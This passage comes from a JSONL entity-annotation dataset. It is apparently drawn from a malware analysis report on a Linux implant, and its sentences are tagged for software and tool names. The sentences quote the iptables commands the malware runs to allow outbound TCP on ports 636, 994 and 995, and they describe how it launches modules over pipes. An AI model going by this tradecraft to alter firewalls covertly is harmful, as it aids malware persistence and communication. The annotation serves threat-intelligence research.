libiptc1 to allow output communication to it.","entities":[{"id":51359,"label":"SOFTWARE","start_offset":118,"end_offset":139},{"id":51357,"label":"tools","start_offset":102,"end_offset":111}],"relations":[],"Comments":[]} {"id":5303,"text":"The rules have the following parameters: Protocol: TCP Chain: filter Table: OUTPUT Action: ACCEPT","entities":[],"relations":[],"Comments":[]} {"id":5304,"text":"Destination ports: 636, 994, and 995","entities":[],"relations":[],"Comments":[]} {"id":5305,"text":"For an unknown reason, the malware deletes the aforementioned rules and creates them again, this time using the iptables command via the system() function.","entities":[],"relations":[],"Comments":[]} {"id":5306,"text":"The commands are as follows: iptables -D OUTPUT -p tcp --dport %d -j ACCEPT iptables -I OUTPUT -p tcp --dport %d -j ACCEPT ","entities":[],"relations":[],"Comments":[]} {"id":5307,"text":"The OpenSSL library is then initialized, and the core component proceeds to initialize the hard-coded modules.","entities":[{"id":51360,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":5308,"text":" Modules initialization ","entities":[],"relations":[],"Comments":[]} {"id":5309,"text":"During this part, the core component initializes the modules.","entities":[],"relations":[],"Comments":[]} {"id":5310,"text":"Communication with the modules is performed via pipes.","entities":[],"relations":[],"Comments":[]} {"id":5311,"text":"For each hard-coded module, the malware creates two pipes before executing them in their own child processes.","entities":[],"relations":[],"Comments":[]} {"id":5312,"text":" Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":5313,"text":"The function that initializes the modules In Figure 1, we inferred the following mod_t structure: Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":5314,"text":"Inferred mod_t structure; the last member is unknown.","entities":[],"relations":[],"Comments":[]} {"id":5315,"text":" Parameters","entities":[],"relations":[],"Comments":[]} {"id":5316,"text":"The parameters are then initialized.","entities":[],"relations":[],"Comments":[]} {"id":5317,"text":"They consist of a 592-byte structure containing essential information sent to the modules via pipes.","entities":[],"relations":[],"Comments":[]} {"id":5318,"text":"This information includes: A “